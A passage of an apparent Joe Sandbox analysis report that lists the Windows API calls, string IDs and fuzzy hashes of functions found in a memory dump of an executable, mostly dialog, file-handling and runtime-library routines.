                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: e90bed59ae9ac04f51ca21b2f453e4971fa28e9a4fb87baf41dd7425887e7aee
                                                                              • Instruction ID: 0a6b2a1aa2ca6aaf5a53f5fc94f045bf0f8ccd953fd0bc8d739327f7c0347f13
                                                                              • Opcode Fuzzy Hash: e90bed59ae9ac04f51ca21b2f453e4971fa28e9a4fb87baf41dd7425887e7aee
                                                                              • Instruction Fuzzy Hash: 76A002D6AB920BBD361867617D97E3F261DD8D0F36B34893EFC81D4081A8805E8D5531
                                                                              Function 00D3F6E1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F6AB
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 41efd5b53fe97ad98cf569b305854ed9d51fb5a7dd00718db130c66500673517
                                                                              • Instruction ID: d2bcf2310d99ec6dc88b2af3ae1c2a26655f1c6a5fa038ad159e3aff0856a101
                                                                              • Opcode Fuzzy Hash: 41efd5b53fe97ad98cf569b305854ed9d51fb5a7dd00718db130c66500673517
                                                                              • Instruction Fuzzy Hash: A0A011C2AB800ABC3A0823202C03E3A020CC0C8B22B308A3AFC82C0080A8800C080A30
                                                                              Function 00D3F6EB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F6AB
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 8ff8ffd219aa3412604b62d421f46b21d70132539cb8f27aeef52a8ece6f3810
                                                                              • Instruction ID: d2bcf2310d99ec6dc88b2af3ae1c2a26655f1c6a5fa038ad159e3aff0856a101
                                                                              • Opcode Fuzzy Hash: 8ff8ffd219aa3412604b62d421f46b21d70132539cb8f27aeef52a8ece6f3810
                                                                              • Instruction Fuzzy Hash: A0A011C2AB800ABC3A0823202C03E3A020CC0C8B22B308A3AFC82C0080A8800C080A30
                                                                              Function 00D3F71A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F70C
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 5e642eb7e81cea17ab37277cb9f7f53e21d0c9167eb1ccb1cd16c3f6a4196497
                                                                              • Instruction ID: a6b97e210f4fe88565a68d227eac86a0bda4811cb1847101ed4a998f270a8c43
                                                                              • Opcode Fuzzy Hash: 5e642eb7e81cea17ab37277cb9f7f53e21d0c9167eb1ccb1cd16c3f6a4196497
                                                                              • Instruction Fuzzy Hash: A9A002D6ABD20BBD361867617D57E3F261DC8D4F62B348D3EFC82C4081A8805E8D5531
                                                                              Function 00D3F72E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00D3F70C
                                                                                • Part of subcall function 00D3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3FA5C
                                                                                • Part of subcall function 00D3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3FA6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 5dcc91715b873cee8523d7cbbf4905c75fd28368aed419df5645eaed3062590d
                                                                              • Instruction ID: a6b97e210f4fe88565a68d227eac86a0bda4811cb1847101ed4a998f270a8c43
                                                                              • Opcode Fuzzy Hash: 5dcc91715b873cee8523d7cbbf4905c75fd28368aed419df5645eaed3062590d
                                                                              • Instruction Fuzzy Hash: A9A002D6ABD20BBD361867617D57E3F261DC8D4F62B348D3EFC82C4081A8805E8D5531
                                                                              Function 00D3BC19 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00D3BFF6,00D71890,00000000,00D72892,00000006), ref: 00D3BC1D
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory
                                                                              • String ID:
                                                                              • API String ID: 1611563598-0
                                                                              • Opcode ID: ef7818ba8e1b083764f2e034561ffd1e12c4cfbf89e2f410792c7583239cc937
                                                                              • Instruction ID: 29daa92f15668447b89f393f9cad7a022fb47b9fec68f2f1280513bed228b547
                                                                              • Opcode Fuzzy Hash: ef7818ba8e1b083764f2e034561ffd1e12c4cfbf89e2f410792c7583239cc937
                                                                              • Instruction Fuzzy Hash: BEA012311007008782000B318F0590E76656F61641F00C0246400C0130D73088A0A511
                                                                              Function 00D2A880 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CloseHandle.KERNELBASE(000000FF,?,?,00D2A83D,?,?,?,?,?,00D5380F,000000FF), ref: 00D2A89B
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: 2502e4f824ee7ddd4e50b83e54935f08091dc536bb20d32e69f7250c9dbf8f0b
                                                                              • Instruction ID: 5a8b2f6b54921d3d78c33d07c1a81d9a3ecb166367059b290f7cf34c08cb7629
                                                                              • Opcode Fuzzy Hash: 2502e4f824ee7ddd4e50b83e54935f08091dc536bb20d32e69f7250c9dbf8f0b
                                                                              • Instruction Fuzzy Hash: 04F08931485B259FDB348A28D448792F7E4EB21329F181B5ED0E2439E5D371658E8A71

                                                                              Non-executed Functions

                                                                              Function 00D3D420 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 233windowfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D212F6: GetDlgItem.USER32(00000000,00003021), ref: 00D2133A
                                                                                • Part of subcall function 00D212F6: SetWindowTextW.USER32(00000000,00D545F4), ref: 00D21350
                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D3D4B1
                                                                              • EndDialog.USER32(?,00000006), ref: 00D3D4C4
                                                                              • GetDlgItem.USER32(?,0000006C), ref: 00D3D4E0
                                                                              • SetFocus.USER32(00000000), ref: 00D3D4E7
                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D3D521
                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D3D558
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00D3D56E
                                                                                • Part of subcall function 00D3BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00D3BC3F
                                                                                • Part of subcall function 00D3BC2B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D3BC50
                                                                                • Part of subcall function 00D3BC2B: SystemTimeToFileTime.KERNEL32(?,?), ref: 00D3BC5E
                                                                                • Part of subcall function 00D3BC2B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00D3BC6C
                                                                                • Part of subcall function 00D3BC2B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D3BC87
                                                                                • Part of subcall function 00D3BC2B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00D3BCAE
                                                                                • Part of subcall function 00D3BC2B: _swprintf.LIBCMT ref: 00D3BCD4
                                                                              • _swprintf.LIBCMT ref: 00D3D5B7
                                                                                • Part of subcall function 00D24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D24A33
                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D3D5CA
                                                                              • FindClose.KERNEL32(00000000), ref: 00D3D5D1
                                                                              • _swprintf.LIBCMT ref: 00D3D620
                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D3D633
                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D3D650
                                                                              • _swprintf.LIBCMT ref: 00D3D683
                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D3D696
                                                                              • _swprintf.LIBCMT ref: 00D3D6E0
                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D3D6F3
                                                                                • Part of subcall function 00D3C093: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D3C0B9
                                                                                • Part of subcall function 00D3C093: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D6072C,?,?), ref: 00D3C108
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                                                              • String ID: %s %s$REPLACEFILEDLG
                                                                              • API String ID: 3464475507-439456425
                                                                              • Opcode ID: 3bb144ff41a5e18dde49a838d6759aa1222643c699a257309971cb7e07a92be9
                                                                              • Instruction ID: 684cadbab2dcd905468883ac2f22adbc888683035205798b9056d3d51fffd32a
                                                                              • Opcode Fuzzy Hash: 3bb144ff41a5e18dde49a838d6759aa1222643c699a257309971cb7e07a92be9
                                                                              • Instruction Fuzzy Hash: 8E71C772548308BBE631ABA4EC4AFFF77ADEB86704F040819F649D2191D671A9048B73
                                                                              Function 00D40A0A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D40A16
                                                                              • IsDebuggerPresent.KERNEL32 ref: 00D40AE2
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D40B02
                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00D40B0C
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                              • String ID:
                                                                              • API String ID: 254469556-0
                                                                              • Opcode ID: b828f3a9a0466a0388dff7ac73f455106a0100cd7f2385f9d1b19c82c3f2e61e
                                                                              • Instruction ID: 17a59cb8f3d67f4c178fd554824dccfc59ace014148864e6cfe86bf3414403f9
                                                                              • Opcode Fuzzy Hash: b828f3a9a0466a0388dff7ac73f455106a0100cd7f2385f9d1b19c82c3f2e61e
                                                                              • Instruction Fuzzy Hash: EB3118B5D053189BDB20DFA4D989BCDBBB8EF08304F1041AAE509AB250EB715A848F65
                                                                              Function 00D27AAF Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 337fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D27AB4
                                                                              • _wcslen.LIBCMT ref: 00D27B1D
                                                                              • _wcslen.LIBCMT ref: 00D27B8E
                                                                                • Part of subcall function 00D28704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D28713
                                                                                • Part of subcall function 00D28704: GetLastError.KERNEL32 ref: 00D28759
                                                                                • Part of subcall function 00D28704: CloseHandle.KERNEL32(?), ref: 00D28768
                                                                                • Part of subcall function 00D2B470: DeleteFileW.KERNELBASE(?,00000000,?,00D2A438,?,?,?,?,00D2892B,?,?,?,00D5380F,000000FF), ref: 00D2B481
                                                                                • Part of subcall function 00D2B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,00D2A438,?,?,?,?,00D2892B,?,?,?,00D5380F,000000FF), ref: 00D2B4AF
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00D27C43
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00D27C5F
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D27DAB
                                                                                • Part of subcall function 00D2B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D27ED0,?,?,?,00000000), ref: 00D2B04C
                                                                                • Part of subcall function 00D2B032: SetFileTime.KERNELBASE(?,?,?,?), ref: 00D2B100
                                                                                • Part of subcall function 00D2A880: CloseHandle.KERNELBASE(000000FF,?,?,00D2A83D,?,?,?,?,?,00D5380F,000000FF), ref: 00D2A89B
                                                                                • Part of subcall function 00D2B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D2B5B5,?,?,?,00D2B405,?,00000001,00000000,?,?), ref: 00D2B8FA
                                                                                • Part of subcall function 00D2B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D2B5B5,?,?,?,00D2B405,?,00000001,00000000,?,?), ref: 00D2B92B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                              • API String ID: 3983180755-3508440684
                                                                              • Opcode ID: c08fbd7213c8b9dd83d4eb210db27d45d2f8fe340c43bf26804b60bf0f6b4ac8
                                                                              • Instruction ID: 2d867a0dec299372075c8f02cbc8365b936fa59e4097b59fea164cb9d272a3eb
                                                                              • Opcode Fuzzy Hash: c08fbd7213c8b9dd83d4eb210db27d45d2f8fe340c43bf26804b60bf0f6b4ac8
                                                                              • Instruction Fuzzy Hash: BBC1E471904229ABDB21DB74DC81FEEB7ACEF14318F04415AF945E7282D770AA84CBB1
                                                                              Function 00D2F608 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _swprintf.LIBCMT ref: 00D2F62E
                                                                                • Part of subcall function 00D24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D24A33
                                                                                • Part of subcall function 00D330F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D63070,00000200,00D2EC48,00000000,?,00000050,00D63070), ref: 00D33112
                                                                              • _strlen.LIBCMT ref: 00D2F64F
                                                                              • SetDlgItemTextW.USER32(?,00D60274,?), ref: 00D2F6AF
                                                                              • GetWindowRect.USER32(?,?), ref: 00D2F6E9
                                                                              • GetClientRect.USER32(?,?), ref: 00D2F6F5
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00D2F795
                                                                              • GetWindowRect.USER32(?,?), ref: 00D2F7C2
                                                                              • SetWindowTextW.USER32(?,?), ref: 00D2F7FB
                                                                              • GetSystemMetrics.USER32(00000008), ref: 00D2F803
                                                                              • GetWindow.USER32(?,00000005), ref: 00D2F80E
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00D2F83B
                                                                              • GetWindow.USER32(00000000,00000002), ref: 00D2F8AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                              • String ID: $%s:$CAPTION$d
                                                                              • API String ID: 2407758923-2512411981
                                                                              • Opcode ID: 3cb4a4aedf9f208cb5b1bf89447979cd935c9ae71f83542caed5c83dfdb9d2d9
                                                                              • Instruction ID: e78f38a074d8ba26a834e898cc6f70d1977bf858b0f014e10d8465c7bffe8bb5
                                                                              • Opcode Fuzzy Hash: 3cb4a4aedf9f208cb5b1bf89447979cd935c9ae71f83542caed5c83dfdb9d2d9
                                                                              • Instruction Fuzzy Hash: 49817172108311AFD710DF68DD89B6FBBF9EB88718F04092DF985D7255D670E8098B62
                                                                              Function 00D4DCE2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___free_lconv_mon.LIBCMT ref: 00D4DD26
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D8DE
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D8F0
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D902
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D914
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D926
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D938
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D94A
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D95C
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D96E
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D980
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D992
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D9A4
                                                                                • Part of subcall function 00D4D8C1: _free.LIBCMT ref: 00D4D9B6
                                                                              • _free.LIBCMT ref: 00D4DD1B
                                                                                • Part of subcall function 00D4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4DA56,?,00000000,?,00000000,?,00D4DA7D,?,00000007,?,?,00D4DE7A,?), ref: 00D4A680
                                                                                • Part of subcall function 00D4A66A: GetLastError.KERNEL32(?,?,00D4DA56,?,00000000,?,00000000,?,00D4DA7D,?,00000007,?,?,00D4DE7A,?,?), ref: 00D4A692
                                                                              • _free.LIBCMT ref: 00D4DD3D
                                                                              • _free.LIBCMT ref: 00D4DD52
                                                                              • _free.LIBCMT ref: 00D4DD5D
                                                                              • _free.LIBCMT ref: 00D4DD7F
                                                                              • _free.LIBCMT ref: 00D4DD92
                                                                              • _free.LIBCMT ref: 00D4DDA0
